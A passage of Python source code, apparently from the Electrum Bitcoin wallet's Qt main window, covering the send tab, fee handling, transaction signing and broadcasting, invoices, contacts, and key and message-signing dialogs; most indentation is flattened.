+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
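        # fee_cb is invoked by the FeeSlider below: in dynamic-fee mode it stores
        # the slider position ('fee_level'), otherwise the absolute rate ('fee_per_kb'),
        # then recomputes the transaction (or the "max" amount) with the new fee.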
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
               _('and you will have the possibility, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
        self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
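            # Colour cue: red when funds are insufficient, blue for fields that
            # will be auto-filled, default for values the user typed in.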
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
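        # A manually entered fee is kept ("frozen") while its field has content
        # or keyboard focus; otherwise the fee is recomputed below.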
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
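        # rbf_policy mirrors the Preferences combo: 0 = always propose RBF,
        # 1 = only when the chosen fee looks low, 2 = never.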
rbf_policy = self.config.get('rbf_policy', 1)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
        '''Password request wrapper. The password is passed to the function
        as the 'password' named argument. "None" indicates an unencrypted
        wallet; if the user cancels the password request, the wrapped
        function is not called at all. An empty input is passed as the
        empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
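    # Illustrative usage (a sketch, not part of the original code): decorating a
    # method with @protected makes the password prompt transparent to the caller,
    # e.g.
    #
    #     @protected
    #     def do_something_sensitive(self, arg, password):
    #         self.wallet.something_sensitive(arg, password)
    #
    # Calling do_something_sensitive(arg) then prompts for the password as needed.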
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
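        # Each output is a (type, address, amount) triple; the checks below reject
        # missing addresses, malformed TYPE_ADDRESS entries and missing amounts.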
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
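    # Minimal usage sketch (an assumption, mirroring sign_done in do_send above):
    #
    #     self.sign_tx_with_password(tx, lambda ok: ok and self.broadcast_transaction(tx, None), password)
    #
    # The callback always receives a single boolean success flag.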
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
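        # broadcast_thread returns a (status, msg) pair for broadcast_done below;
        # status is False when the payment request expired or broadcasting failed.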
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
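        # An 'r' parameter (or a signed 'name'/'sig' pair) points to a BIP70
        # payment request; it is fetched asynchronously and delivered via on_pr.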
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
        outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2]) + ' ' + self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
        msg = _('Password was updated successfully') if new_password else _('Password is disabled; this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
            # only show the combobox if the wallet has more than one master public key (e.g. multisig cosigners)
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
